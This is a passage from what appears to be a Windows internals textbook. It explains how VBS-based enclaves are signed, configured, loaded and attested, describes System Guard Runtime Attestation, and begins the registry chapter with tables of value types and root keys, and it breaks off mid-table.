data. By default, the system only supports the execution of enclaves that are
properly signed. This precludes the possibility that unsigned malware can
execute on a system outside the view of anti-malware software, which is
incapable of inspecting the contents of any enclave.
During execution, control can transfer back and forth between the enclave
and its containing process. Code executing inside of an enclave has access to
all data within the virtual address range of the enclave. Furthermore, it has
read and write access of the containing unsecure process address space. All
memory within the enclave’s virtual address range will be inaccessible to the
containing process. If multiple enclaves exist within a single host process,
each enclave will be able to access only its own memory and the memory
that is accessible to the host process.
As for hardware enclaves, when code is running in an enclave, it can
obtain a sealed enclave report, which can be used by a third-party entity to
validate that the code is running with the isolation guarantees of a VBS
enclave, and which can further be used to validate the specific version of
code running. This report includes information about the host system, the
enclave itself, and all DLLs that may have been loaded into the enclave, as
well as information indicating whether the enclave is executing with
debugging capabilities enabled.
A VBS-based enclave is distributed as a DLL, which has certain specific
characteristics:
■ It is signed with an authenticode signature, and the leaf certificate
includes a valid EKU that permits the image to be run as an enclave.
The root authority that has emitted the digital certificate should be
Microsoft, or a third-party signing authority covered by a certificate
manifest that’s countersigned by Microsoft. This implies that third-
party companies could sign and run their own enclaves. Valid digital
signature EKUs are the IUM EKU (1.3.6.1.4.1.311.10.3.37) for
internal Windows-signed enclaves or the Enclave EKU
(1.3.6.1.4.1.311.10.3.42) for all the third-party enclaves.
■ It includes an enclave configuration section (represented by an
IMAGE_ENCLAVE_CONFIG data structure), which describes
information about the enclave and which is linked to its image’s load
configuration data directory.
■ It includes the correct Control Flow Guard (CFG) instrumentation.
The enclave’s configuration section is important because it includes
important information needed to properly run and seal the enclave: the
unique family ID and image ID, which are specified by the enclave’s author
and identify the enclave binary, the secure version number and the enclave’s
policy information (like the expected virtual size, the maximum number of
threads that can run, and the debuggability of the enclave). Furthermore, the
enclave’s configuration section includes the list of images that may be
imported by the enclave, included with their identity information. An
enclave’s imported module can be identified by a combination of the family
ID and image ID, or by a combination of the generated unique ID, which is
calculated starting from the hash of the binary, and author ID, which is
derived from the certificate used to sign the enclave. (This value expresses
the identity of who has constructed the enclave.) The imported module
descriptor must also include the minimum secure version number.
The Secure Kernel offers some basic system services to enclaves through
the VBS enclave runtime DLL, Vertdll.dll, which is mapped in the enclave
address space. These services include: a limited subset of the standard C
runtime library, the ability to allocate or free secure memory within the
address range of the enclave, synchronization services, structured exception
handling support, basic cryptographic functions, and the ability to seal data.
EXPERIMENT: Dumping the enclave configuration
In this experiment, we use the Microsoft Incremental linker
(link.exe) included in the Windows SDK and WDK to dump
software enclave configuration data. Both packages are
downloadable from the web. You can also use the EWDK, which
contains all the necessary tools and does not require any
installation. It’s available at https://docs.microsoft.com/en-
us/windows-hardware/drivers/download-the-wdk.
Open the Visual Studio Developer Command Prompt through
the Cortana search box or by executing the LaunchBuildEnv.cmd
script file contained in the EWDK’s Iso image. We will analyze the
configuration data of the System Guard Routine Attestation
enclave—which is shown in Figure 9-40 and will be described later
in this chapter—with the link.exe /dump /loadconfig command:
The command’s output is large. So, in the example shown in the
preceding figure, we have redirected it to the
SgrmEnclave_secure_loadconfig.txt file. If you open the new
output file, you see that the binary image contains a CFG table and
includes a valid enclave configuration pointer, which targets the
following data:
Click here to view code image
Enclave Configuration
00000050 size
0000004C minimum required config size
00000000 policy flags
00000003 number of enclave import
descriptors
0004FA04 RVA to enclave import descriptors
00000050 size of an enclave import
descriptor
00000001 image version
00000001 security version
0000000010000000 enclave size
00000008 number of threads
00000001 enclave flags
family ID : B1 35 7C 2B 69 9F 47 F9 BB C9 4F
44 F2 54 DB 9D
image ID : 24 56 46 36 CD 4A D8 86 A2 F4 EC
25 A9 72 02
ucrtbase_enclave.dll
0 minimum security version
0 reserved
match type : image ID
family ID : 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00
image ID : F0 3C CD A7 E8 7B 46 EB AA
E7 1F 13 D5 CD DE 5D
unique/author ID : 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00
bcrypt.dll
0 minimum security version
0 reserved
match type : image ID
family ID : 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00
image ID : 20 27 BD 68 75 59 49 B7 BE
06 34 50 E2 16 D7 ED
unique/author ID : 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00
...
The configuration section contains the binary image’s enclave
data (like the family ID, image ID, and security version number)
and the import descriptor array, which communicates to the Secure
Kernel from which library the main enclave’s binary can safely
depend on. You can redo the experiment with the Vertdll.dll library
and with all the binaries imported from the System Guard Routine
Attestation enclave.
Enclave lifecycle
In Chapter 5 of Part 1, we discussed the lifecycle of a hardware enclave
(SGX-based). The lifecycle of a VBS-based enclave is similar; Microsoft has
enhanced the already available enclave APIs to support the new type of VBS-
based enclaves.
Step 1: Creation
An application creates a VBS-based enclave by specifying the
ENCLAVE_TYPE_VBS flag to the CreateEnclave API. The caller should
specify an owner ID, which identifies the owner of the enclave. The enclave
creation code, in the same way as for hardware enclaves, ends up calling the
NtCreateEnclave in the kernel. The latter checks the parameters, copies the
passed-in structures, and attaches to the target process in case the enclave is
to be created in a different process than the caller’s. The MiCreateEnclave
function allocates an enclave-type VAD describing the enclave virtual
memory range and selects a base virtual address if not specified by the caller.
The kernel allocates the memory manager’s VBS enclave data structure and
the per-process enclave hash table, used for fast lookup of the enclave
starting by its number. If the enclave is the first created for the process, the
system also creates an empty secure process (which acts as a container for the
enclaves) in VTL 1 by using the CREATE_PROCESS secure call (see the
earlier section “Trustlets creation” for further details).
The CREATE_ENCLAVE secure call handler in VTL 1 performs the actual
work of the enclave creation: it allocates the secure enclave key data
structure (SKMI_ENCLAVE), sets the reference to the container secure
process (which has just been created by the NT kernel), and creates the
secure VAD describing the entire enclave virtual address space (the secure
VAD contains similar information to its VTL 0 counterpart). This VAD is
inserted in the containing process’s VAD tree (and not in the enclave itself).
An empty virtual address space for the enclave is created in the same way as
for its containing process: the page table root is filled by system entries only.
Step 2: Loading modules into the enclave
Differently from hardware-based enclaves, the parent process can load only
modules into the enclave but not arbitrary data. This will cause each page of
the image to be copied into the address space in VTL 1. Each image’s page in
the VTL 1 enclave will be a private copy. At least one module (which acts as
the main enclave image) needs to be loaded into the enclave; otherwise, the
enclave can’t be initialized. After the VBS enclave has been created, an
application calls the LoadEnclaveImage API, specifying the enclave base
address and the name of the module that must be loaded in the enclave. The
Windows Loader code (in Ntdll.dll) searches the specified DLL name, opens
and validates its binary file, and creates a section object that is mapped with
read-only access right in the calling process.
After the loader maps the section, it parses the image’s import address
table with the goal to create a list of the dependent modules (imported, delay
loaded, and forwarded). For each found module, the loader checks whether
there is enough space in the enclave for mapping it and calculates the correct
image base address. As shown in Figure 9-40, which represents the System
Guard Runtime Attestation enclave, modules in the enclave are mapped
using a top-down strategy. This means that the main image is mapped at the
highest possible virtual address, and all the dependent ones are mapped in
lower addresses one next to each other. At this stage, for each module, the
Windows Loader calls the NtLoadEnclaveData kernel API.
Figure 9-40 The System Guard Runtime Attestation secure enclave (note
the empty space at the base of the enclave).
For loading the specified image in the VBS enclave, the kernel starts a
complex process that allows the shared pages of its section object to be
copied in the private pages of the enclave in VTL 1. The
MiMapImageForEnclaveUse function gets the control area of the section
object and validates it through SKCI. If the validation fails, the process is
interrupted, and an error is returned to the caller. (All the enclave’s modules
should be correctly signed as discussed previously.) Otherwise, the system
attaches to the secure system process and maps the image’s section object in
its address space in VTL 0. The shared pages of the module at this time could
be valid or invalid; see Chapter 5 of Part 1 for further details. It then commits
the virtual address space of the module in the containing process. This
creates private VTL 0 paging data structures for demand-zero PTEs, which
will be later populated by the Secure Kernel when the image is loaded in
VTL 1.
The LOAD_ENCLAVE_MODULE secure call handler in VTL 1 obtains
the SECURE_IMAGE of the new module (created by SKCI) and verifies
whether the image is suitable for use in a VBS-based enclave (by verifying
the digital signature characteristics). It then attaches to the secure system
process in VTL 1 and maps the secure image at the same virtual address
previously mapped by the NT kernel. This allows the sharing of the
prototype PTEs from VTL 0. The Secure Kernel then creates the secure VAD
that describes the module and inserts it into the VTL 1 address space of the
enclave. It finally cycles between each module’s section prototype PTE. For
each nonpresent prototype PTE, it attaches to the secure system process and
uses the GET_PHYSICAL_PAGE normal call to invoke the NT page fault
handler (MmAccessFault), which brings in memory the shared page. The
Secure Kernel performs a similar process for the private enclave pages,
which have been previously committed by the NT kernel in VTL 0 by
demand-zero PTEs. The NT page fault handler in this case allocates zeroed
pages. The Secure Kernel copies the content of each shared physical page
into each new private page and applies the needed private relocations if
needed.
The loading of the module in the VBS-based enclave is complete. The
Secure Kernel applies the SLAT protection to the private enclave pages (the
NT kernel has no access to the image’s code and data in the enclave),
unmaps the shared section from the secure system process, and yields the
execution to the NT kernel. The Loader can now proceed with the next
module.
Step 3: Enclave initialization
After all the modules have been loaded into the enclave, an application
initializes the enclave using the InitializeEnclave API, and specifies the
maximum number of threads supported by the enclave (which will be bound
to threads able to perform enclave calls in the containing process). The
Secure Kernel’s INITIALIZE_ENCLAVE secure call’s handler verifies that
the policies specified during enclave creation are compatible with the policies
expressed in the configuration information of the primary image, verifies that
the enclave’s platform library is loaded (Vertdll.dll), calculates the final 256-
bit hash of the enclave (used for generating the enclave sealed report), and
creates all the secure enclave threads. When the execution control is returned
to the Windows Loader code in VTL 0, the system performs the first enclave
call, which executes the initialization code of the platform DLL.
Step 4: Enclave calls (inbound and outbound)
After the enclave has been correctly initialized, an application can make an
arbitrary number of calls into the enclave. All the callable functions in the
enclave need to be exported. An application can call the standard
GetProcAddress API to get the address of the enclave’s function and then use
the CallEnclave routine for transferring the execution control to the secure
enclave. In this scenario, which describes an inbound call, the NtCallEnclave
kernel routine performs the thread selection algorithm, which binds the
calling VTL 0 thread to an enclave thread, according to the following rules:
■ If the normal thread was not previously called by the enclave
(enclaves support nested calls), then an arbitrary idle enclave thread is
selected for execution. In case no idle enclave threads are available,
the call blocks until an enclave thread becomes available (if specified
by the caller; otherwise the call simply fails).
■ In case the normal thread was previously called by the enclave, then
the call into the enclave is made on the same enclave thread that
issued the previous call to the host.
A list of enclave thread’s descriptors is maintained by both the NT and
Secure Kernel. When a normal thread is bound to an enclave thread, the
enclave thread is inserted in another list, which is called the bound threads
list. Enclave threads tracked by the latter are currently running and are not
available anymore.
After the thread selection algorithm succeeds, the NT kernel emits the
CALLENCLAVE secure call. The Secure Kernel creates a new stack frame
for the enclave and returns to user mode. The first user mode function
executed in the context of the enclave is RtlEnclaveCallDispatcher. The
latter, in case the enclave call was the first one ever emitted, transfers the
execution to the initialization routine of the VSM enclave runtime DLL
(Vertdll.dll), which initializes the CRT, the loader, and all the services
provided to the enclave; it finally calls the DllMain function of the enclave’s
main module and of all its dependent images (by specifying a
DLL_PROCESS_ATTACH reason).
In normal situations, where the enclave platform DLL has been already
initialized, the enclave dispatcher invokes the DllMain of each module by
specifying a DLL_THREAD_ATTACH reason, verifies whether the specified
address of the target enclave’s function is valid, and, if so, finally calls the
target function. When the target enclave’s routine finishes its execution, it
returns to VTL 0 by calling back into the containing process. For doing this,
it still relies on the enclave platform DLL, which again calls the
NtCallEnclave kernel routine. Even though the latter is implemented slightly
differently in the Secure Kernel, it adopts a similar strategy for returning to
VTL 0. The enclave itself can emit enclave calls for executing some function
in the context of the unsecure containing process. In this scenario (which
describes an outbound call), the enclave code uses the CallEnclave routine
and specifies the address of an exported function in the containing process’s
main module.
Step 5: Termination and destruction
When termination of an entire enclave is requested through the
TerminateEnclave API, all threads executing inside the enclave will be forced
to return to VTL 0. Once termination of an enclave is requested, all further
calls into the enclave will fail. As threads terminate, their VTL1 thread state
(including thread stacks) is destroyed. Once all threads have stopped
executing, the enclave can be destroyed. When the enclave is destroyed, all
remaining VTL 1 state associated with the enclave is destroyed, too
(including the entire enclave address space), and all pages are freed in VTL 0.
Finally, the enclave VAD is deleted and all committed enclave memory is
freed. Destruction is triggered when the containing process calls VirtualFree
with the base of the enclave’s address range. Destruction is not possible
unless the enclave has been terminated or was never initialized.
Note
As we have discussed previously, all the memory pages that are mapped
into the enclave address space are private. This has multiple implications.
No memory pages that belong to the VTL 0 containing process are
mapped in the enclave address space, though (and also no VADs
describing the containing process’s allocation is present). So how can the
enclave access all the memory pages of the containing process?
The answer is in the Secure Kernel page fault handler
(SkmmAccessFault). In its code, the fault handler checks whether the
faulting process is an enclave. If it is, the fault handler checks whether the
fault happens because the enclave tried to execute some code outside its
region. In this case, it raises an access violation error. If the fault is due to
a read or write access outside the enclave’s address space, the secure page
fault handler emits a GET_PHYSICAL_PAGE normal service, which
results in the VTL 0 access fault handler to be called. The VTL 0 handler
checks the containing process VAD tree, obtains the PFN of the page
from its PTE—by bringing it in memory if needed—and returns it to VTL
1. At this stage, the Secure Kernel can create the necessary paging
structures to map the physical page at the same virtual address (which is
guaranteed to be available thanks to the property of the enclave itself) and
resumes the execution. The page is now valid in the context of the secure
enclave.
Sealing and attestation
VBS-based enclaves, like hardware-based enclaves, support both the sealing
and attestation of the data. The term sealing refers to the encryption of
arbitrary data using one or more encryption keys that aren’t visible to the
enclave’s code but are managed by the Secure Kernel and tied to the machine
and to the enclave’s identity. Enclaves will never have access to those keys;
instead, the Secure Kernel offers services for sealing and unsealing arbitrary
contents (through the EnclaveSealData and EnclaveUnsealData APIs) using
an appropriate key designated by the enclave. At the time the data is sealed, a
set of parameters is supplied that controls which enclaves are permitted to
unseal the data. The following policies are supported:
■ Security version number (SVN) of the Secure Kernel and of the
primary image No enclave can unseal any data that was sealed by a
later version of the enclave or the Secure Kernel.
■ Exact code The data can be unsealed only by an enclave that maps
the same identical modules of the enclave that has sealed it. The
Secure Kernel verifies the hash of the Unique ID of every image
mapped in the enclave to allow a proper unsealing.
■ Same image, family, or author The data can be unsealed only by an
enclave that has the same author ID, family ID, and/or image ID.
■ Runtime policy The data can be unsealed only if the unsealing
enclave has the same debugging policy of the original one
(debuggable versus nondebuggable).
It is possible for every enclave to attest to any third party that it is running
as a VBS enclave with all the protections offered by the VBS-enclave
architecture. An enclave attestation report provides proof that a specific
enclave is running under the control of the Secure Kernel. The attestation
report contains the identity of all code loaded into the enclave as well as
policies controlling how the enclave is executing.
Describing the internal details of the sealing and attestation operations is
outside the scope of this book. An enclave can generate an attestation report
through the EnclaveGetAttestationReport API. The memory buffer returned
by the API can be transmitted to another enclave, which can “attest” the
integrity of the environment in which the original enclave ran by verifying
the attestation report through the EnclaveVerifyAttestationReport function.
System Guard runtime attestation
System Guard runtime attestation (SGRA) is an operating system integrity
component that leverages the aforementioned VBS-enclaves—together with a
remote attestation service component—to provide strong guarantees around
its execution environment. This environment is used to assert sensitive
system properties at runtime and allows for a relying party to observe
violations of security promises that the system provides. The first
implementation of this new technology was introduced in Windows 10 April
2018 Update (RS4).
SGRA allows an application to view a statement about the security posture
of the device. This statement is composed of three parts:
■ A session report, which includes a security level describing the
attestable boot-time properties of the device
■ A runtime report, which describes the runtime state of the device
■ A signed session certificate, which can be used to verify the reports
The SGRA service, SgrmBroker.exe, hosts a component
(SgrmEnclave_secure.dll) that runs in a VTL 1 as a VBS enclave that
continually asserts the system for runtime violations of security features.
These assertions are surfaced in the runtime report, which can be verified on
the backend by a relying part. As the assertions run in a separate domain-of-
trust, attacking the contents of the runtime report directly becomes difficult.
SGRA internals
Figure 9-41 shows a high-level overview of the architecture of Windows
Defender System Guard runtime attestation, which consists of the following
client-side components:
■ The VTL-1 assertion engine: SgrmEnclave_secure.dll
■ A VTL-0 kernel mode agent: SgrmAgent.sys
■ A VTL-0 WinTCB Protected broker process hosting the assertion
engine: SgrmBroker.exe
■ A VTL-0 LPAC process used by the WinTCBPP broker process to
interact with the networking stack: SgrmLpac.exe
Figure 9-41 Windows Defender System Guard runtime attestation’s
architecture.
To be able to rapidly respond to threats, SGRA includes a dynamic
scripting engine (Lua) forming the core of the assertion mechanism that
executes in a VTL 1 enclave—an approach that allows frequent assertion
logic updates.
Due to the isolation provided by the VBS enclave, threads executing in
VTL 1 are limited in terms of their ability to access VTL 0 NT APIs.
Therefore, for the runtime component of SGRA to perform meaningful work,
a way of working around the limited VBS enclave API surface is necessary.
An agent-based approach is implemented to expose VTL 0 facilities to the
logic running in VTL 1; these facilities are termed assists and are serviced by
the SgrmBroker user mode component or by an agent driver running in VTL
0 kernel mode (SgrmAgent.sys). The VTL 1 logic running in the enclave can
call out to these VTL 0 components with the goal of requesting assists that
provide a range of facilities, including NT kernel synchronize primitives,
page mapping capabilities, and so on.
As an example of how this mechanism works, SGRA is capable of
allowing the VTL 1 assertion engine to directly read VTL 0–owned physical
pages. The enclave requests a mapping of an arbitrary page via an assist. The
page would then be locked and mapped into the SgrmBroker VTL 0 address
space (making it resident). As VBS enclaves have direct access to the host
process address space, the secure logic can read directly from the mapped
virtual addresses. These reads must be synchronized with the VTL 0 kernel
itself. The VTL 0 resident broker agent (SgrmAgent.sys driver) is also used
to perform synchronization.
Assertion logic
As mentioned earlier, SGRA asserts system security properties at runtime.
These assertions are executed within the assertion engine hosted in the VBS-
based enclave. Signed Lua bytecode describing the assertion logic is provided
to the assertion engine during start up.
Assertions are run periodically. When a violation of an asserted property is
discovered (that is, when the assertion “fails”), the failure is recorded and
stored within the enclave. This failure will be exposed to a relying party in
the runtime report that is generated and signed (with the session certificate)
within the enclave.
An example of the assertion capabilities provided by SGRA are the asserts
surrounding various executive process object attributes—for example, the
periodic enumeration of running processes and the assertion of the state of a
process’s protection bits that govern protected process policies.
The flow for the assertion engine performing this check can be
approximated to the following steps:
1.
The assertion engine running within VTL 1 calls into its VTL 0 host
process (SgrmBroker) to request that an executive process object be
referenced by the kernel.
2.
The broker process forwards this request to the kernel mode agent
(SgrmAgent), which services the request by obtaining a reference to
the requested executive process object.
3.
The agent notifies the broker that the request has been serviced and
passes any necessary metadata down to the broker.
4.
The broker forwards this response to the requesting VTL 1 assertion
logic.
5.
The logic can then elect to have the physical page backing the
referenced executive process object locked and mapped into its
accessible address space; this is done by calling out of the enclave
using a similar flow as steps 1 through 4.
6.
Once the page is mapped, the VTL 1 engine can read it directly and
check the executive process object protection bit against its internally
held context.
7.
The VTL 1 logic again calls out to VTL 0 to unwind the page
mapping and kernel object reference.
Reports and trust establishment
A WinRT-based API is exposed to allow relying parties to obtain the SGRA
session certificate and the signed session and runtime reports. This API is not
public and is available under NDA to vendors that are part of the Microsoft
Virus Initiative (note that Microsoft Defender Advanced Threat Protection is
currently the only in-box component that interfaces directly with SGRA via
this API).
The flow for obtaining a trusted statement from SGRA is as follows:
1.
A session is created between the relying party and SGRA.
Establishment of the session requires a network connection. The
SgrmEnclave assertion engine (running in VTL-1) generates a public-
private key pair, and the SgrmBroker protected process retrieves the
TCG log and the VBS attestation report, sending them to Microsoft’s
System Guard attestation service with the public component of the
key generated in the previous step.
2.
The attestation service verifies the TCG log (from the TPM) and the
VBS attestation report (as proof that the logic is running within a
VBS enclave) and generates a session report describing the attested
boot time properties of the device. It signs the public key with an
SGRA attestation service intermediate key to create a certificate that
will be used to verify runtime reports.
3.
The session report and the certificate are returned to the relying party.
From this point, the relying party can verify the validity of the session
report and runtime certificate.
4.
Periodically, the relying party can request a runtime report from
SGRA using the established session: the SgrmEnclave assertion
engine generates a runtime report describing the state of the assertions
that have been run. The report will be signed using the paired private
key generated during session creation and returned to the relying
party (the private key never leaves the enclave).
5.
The relying party can verify the validity of the runtime report against
the runtime certificate obtained earlier and make a policy decision
based on both the contents of the session report (boot-time attested
state) and the runtime report (asserted state).
SGRA provides some API that relying parties can use to attest to the state
of the device at a point in time. The API returns a runtime report that details
the claims that Windows Defender System Guard runtime attestation makes
about the security posture of the system. These claims include assertions,
which are runtime measurements of sensitive system properties. For
example, an app could ask Windows Defender System Guard to measure the
security of the system from the hardware-backed enclave and return a report.
The details in this report can be used by the app to decide whether it
performs a sensitive financial transaction or displays personal information.
As discussed in the previous section, a VBS-based enclave can also expose
an enclave attestation report signed by a VBS-specific signing key. If
Windows Defender System Guard can obtain proof that the host system is
running with VSM active, it can use this proof with a signed session report to
ensure that the particular enclave is running. Establishing the trust necessary
to guarantee that the runtime report is authentic, therefore, requires the
following:
1.
Attesting to the boot state of the machine; the OS, hypervisor, and
Secure Kernel (SK) binaries must be signed by Microsoft and
configured according to a secure policy.
2.
Binding trust between the TPM and the health of the hypervisor to
allow trust in the Measured Boot Log.
3.
Extracting the needed key (VSM IDKs) from the Measured Boot Log
and using these to verify the VBS enclave signature (see Chapter 12
for further details).
4.
Signing of the public component of an ephemeral key-pair generated
within the enclave with a trusted Certificate Authority to issue a
session certificate.
5.
Signing of the runtime report with the ephemeral private key.
Networking calls between the enclave and the Windows Defender System
Guard attestation service are made from VTL 0. However, the design of the
attestation protocol ensures that it is resilient against tampering even over
untrusted transport mechanisms.
Numerous underlying technologies are required before the chain of trust
described earlier can be sufficiently established. To inform a relying party of
the level of trust in the runtime report that they can expect on any particular
configuration, a security level is assigned to each Windows Defender System
Guard attestation service-signed session report. The security level reflects the
underlying technologies enabled on the platform and attributes a level of trust
based on the capabilities of the platform. Microsoft is mapping the
enablement of various security technologies to security levels and will share
this when the API is published for third-party use. The highest level of trust
is likely to require the following features, at the very least:
■ VBS-capable hardware and OEM configuration.
■ Dynamic root-of-trust measurements at boot.
■ Secure boot to verify hypervisor, NT, and SK images.
■ Secure policy ensuring Hypervisor Enforced Code Integrity (HVCI)
and kernel mode code integrity (KMCI), test-signing is disabled, and
kernel debugging is disabled.
■ The ELAM driver is present.
Conclusion
Windows is able to manage and run multiple virtual machines thanks to the
Hyper-V hypervisor and its virtualization stack, which, combined together,
support different operating systems running in a VM. Over the years, the two
components have evolved to provide more optimizations and advanced
features for the VMs, like nested virtualization, multiple schedulers for the
virtual processors, different types of virtual hardware support, VMBus, VA-
backed VMs, and so on.
Virtualization-based security provides to the root operating system a new
level of protection against malware and stealthy rootkits, which are no longer
able to steal private and confidential information from the root operating
system’s memory. The Secure Kernel uses the services supplied by the
Windows hypervisor to create a new execution environment (VTL 1) that is
protected and not accessible to the software running in the main OS.
Furthermore, the Secure Kernel delivers multiple services to the Windows
ecosystem that help to maintain a more secure environment.
The Secure Kernel also defines the Isolated User Mode, allowing user
mode code to be executed in the new protected environment through trustlets,
secure devices, and enclaves. The chapter ended with the analysis of System
Guard Runtime Attestation, a component that uses the services exposed by
the Secure Kernel to measure the workstation’s execution environment and to
provide strong guarantees about its integrity.
In the next chapter, we look at the management and diagnostics
components of Windows and discuss important mechanisms involved with
their infrastructure: the registry, services, Task scheduler, Windows
Management Instrumentation (WMI), kernel Event Tracing, and so on.
CHAPTER 10
Management, diagnostics, and
tracing
This chapter describes fundamental mechanisms in the Microsoft Windows
operating system that are critical to its management and configuration. In
particular, we describe the Windows registry, services, the Unified
Background process manager, and Windows Management Instrumentation
(WMI). The chapter also presents some fundamental components used for
diagnosis and tracing purposes like Event Tracing for Windows (ETW),
Windows Notification Facility (WNF), and Windows Error Reporting
(WER). A discussion on the Windows Global flags and a brief introduction
on the kernel and User Shim Engine conclude the chapter.
The registry
The registry plays a key role in the configuration and control of Windows
systems. It is the repository for both systemwide and per-user settings.
Although most people think of the registry as static data stored on the hard
disk, as you’ll see in this section, the registry is also a window into various
in-memory structures maintained by the Windows executive and kernel.
We’re starting by providing you with an overview of the registry structure,
a discussion of the data types it supports, and a brief tour of the key
information Windows maintains in the registry. Then we look inside the
internals of the configuration manager, the executive component responsible
for implementing the registry database. Among the topics we cover are the
internal on-disk structure of the registry, how Windows retrieves
configuration information when an application requests it, and what measures
are employed to protect this critical system database.
Viewing and changing the registry
In general, you should never have to edit the registry directly. Application
and system settings stored in the registry that require changes should have a
corresponding user interface to control their modification. However, as we
mention several times in this book, some advanced and debug settings have
no editing user interface. Therefore, both graphical user interface (GUI) and
command-line tools are included with Windows to enable you to view and
modify the registry.
Windows comes with one main GUI tool for editing the registry—
Regedit.exe—and several command-line registry tools. Reg.exe, for instance,
has the ability to import, export, back up, and restore keys, as well as to
compare, modify, and delete keys and values. It can also set or query flags
used in UAC virtualization. Regini.exe, on the other hand, allows you to
import registry data based on text files that contain ASCII or Unicode
configuration data.
The Windows Driver Kit (WDK) also supplies a redistributable
component, Offregs.dll, which hosts the Offline Registry Library. This
library allows loading registry hive files (covered in the “Hives” section later
in the chapter) in their binary format and applying operations on the files
themselves, bypassing the usual logical loading and mapping that Windows
requires for registry operations. Its use is primarily to assist in offline registry
access, such as for purposes of integrity checking and validation. It can also
provide performance benefits if the underlying data is not meant to be visible
by the system because the access is done through local file I/O instead of
registry system calls.
Registry usage
There are four principal times at which configuration data is read:
■ During the initial boot process, the boot loader reads configuration
data and the list of boot device drivers to load into memory before
initializing the kernel. Because the Boot Configuration Database
(BCD) is really stored in a registry hive, one could argue that registry
access happens even earlier, when the Boot Manager displays the list
of operating systems.
■ During the kernel boot process, the kernel reads settings that specify
which device drivers to load and how various system elements—such
as the memory manager and process manager—configure themselves
and tune system behavior.
■ During logon, Explorer and other Windows components read per-user
preferences from the registry, including network drive-letter
mappings, desktop wallpaper, screen saver, menu behavior, icon
placement, and, perhaps most importantly, which startup programs to
launch and which files were most recently accessed.
■ During their startup, applications read systemwide settings, such as a
list of optionally installed components and licensing data, as well as
per-user settings that might include menu and toolbar placement and a
list of most-recently accessed documents.
However, the registry can be read at other times as well, such as in
response to a modification of a registry value or key. Although the registry
provides asynchronous callbacks that are the preferred way to receive change
notifications, some applications constantly monitor their configuration
settings in the registry through polling and automatically take updated
settings into account. In general, however, on an idle system there should be
no registry activity and such applications violate best practices. (Process
Monitor, from Sysinternals, is a great tool for tracking down such activity
and the applications at fault.)
The registry is commonly modified in the following cases:
■ Although not a modification, the registry’s initial structure and many
default settings are defined by a prototype version of the registry that
ships on the Windows setup media that is copied onto a new
installation.
■ Application setup utilities create default application settings and
settings that reflect installation configuration choices.
■ During the installation of a device driver, the Plug and Play system
creates settings in the registry that tell the I/O manager how to start
the driver and creates other settings that configure the driver’s
operation. (See Chapter 6, “I/O system,” in Part 1 for more
information on how device drivers are installed.)
■ When you change application or system settings through user
interfaces, the changes are often stored in the registry.
Registry data types
The registry is a database whose structure is similar to that of a disk volume.
The registry contains keys, which are similar to a disk’s directories, and
values, which are comparable to files on a disk. A key is a container that can
consist of other keys (subkeys) or values. Values, on the other hand, store
data. Top-level keys are root keys. Throughout this section, we’ll use the
words subkey and key interchangeably.
Both keys and values borrow their naming convention from the file
system. Thus, you can uniquely identify a value with the name mark, which
is stored in a key called trade, with the name trade\mark. One exception to
this naming scheme is each key’s unnamed value. Regedit displays the
unnamed value as (Default).
Values store different kinds of data and can be one of the 12 types listed in
Table 10-1. The majority of registry values are REG_DWORD,
REG_BINARY, or REG_SZ. Values of type REG_DWORD can store
numbers or Booleans (true/false values); REG_BINARY values can store
numbers larger than 32 bits or raw data such as encrypted passwords;
REG_SZ values store strings (Unicode, of course) that can represent
elements such as names, file names, paths, and types.
Table 10-1 Registry value types
Value Type
Description
REG_NONE
No value type
REG_SZ
Fixed-length Unicode string
REG_EXPAND_SZ
Variable-length Unicode string that can
have embedded environment variables
REG_BINARY
Arbitrary-length binary data
REG_DWORD
32-bit number
REG_DWORD_BIG_E
NDIAN
32-bit number, with high byte first
REG_LINK
Unicode symbolic link
REG_MULTI_SZ
Array of Unicode NULL-terminated strings
REG_RESOURCE_LIS
T
Hardware resource description
REG_FULL_RESOURC
E_DESCRIPTOR
Hardware resource description
REG_RESOURCE_REQ
UIREMENTS_LIST
Resource requirements
REG_QWORD
64-bit number
The REG_LINK type is particularly interesting because it lets a key
transparently point to another key. When you traverse the registry through a
link, the path searching continues at the target of the link. For example, if
\Root1\Link has a REG_LINK value of \Root2\RegKey and RegKey contains
the value RegValue, two paths identify RegValue: \Root1\Link\RegValue and
\Root2\RegKey\RegValue. As explained in the next section, Windows
prominently uses registry links: three of the six registry root keys are just
links to subkeys within the three nonlink root keys.
Registry logical structure
You can chart the organization of the registry via the data stored within it.
There are nine root keys (and you can’t add new root keys or delete existing
ones) that store information, as shown in Table 10-2.
Table 10-2 The nine root keys
Root Key
Description
HKEY_CURREN
T_USER
Stores data associated with the currently logged-on
user
HKEY_CURREN
T_USER_LOCAL
_SETTINGS
Stores data associated with the currently logged-on
user that are local to the machine and are excluded
from a roaming user profile
HKEY_USERS
Stores information about all the accounts on the
machine
HKEY_CLASSE
S_ROOT
Stores file association and Component Object
Model (COM) object registration information
HKEY_LOCAL_
MACHINE
Stores system-related information
HKEY_PERFOR
MANCE_DATA
Stores performance information
HKEY_PERFOR
Stores text strings that describe performance
MANCE_NLSTE
XT
counters in the local language of the area in which
the computer system is running
HKEY_PERFOR
MANCE_TEXT
Stores text strings that describe performance
counters in US English.
HKEY_CURREN
T_CONFIG
Stores some information about the current
hardware profile (deprecated)
Why do root-key names begin with an H? Because the root-key names
represent Windows handles (H) to keys (KEY). As mentioned in Chapter 1,
“Concepts and tools” of Part 1, HKLM is an abbreviation used for
HKEY_LOCAL_MACHINE. Table 10-3 lists all the root keys and their
abbreviations. The following sections explain in detail the contents and
purpose of each of these root keys.
Table 10-3 Registry root keys
Root Key
A
b
b
re
vi
at
io
n
Description
Link
HKEY_CU
RRENT_U
SER
H
K
C
U
Points to the
user profile of
the currently
logged-on user
Subkey under HKEY_USERS
corresponding to currently
logged-on user
HKEY_CU
RRENT_U
SER_LOC
AL_SETTI
H
K
C
U
Points to the
local settings
of the
currently
Link to
HKCU\Software\Classes\Local
Settings
NGS
L
S
logged-on user
HKEY_US
ERS
H
K
U
Contains
subkeys for all
loaded user
profiles
Not a link
HKEY_CL
ASSES_RO
OT
H
K
C
R
Contains file
association
and COM
registration
information
Not a direct link, but rather a
merged view of
HKLM\SOFTWARE\Classes and
HKEY_USERS\
<SID>\SOFTWARE\Classes
HKEY_LO
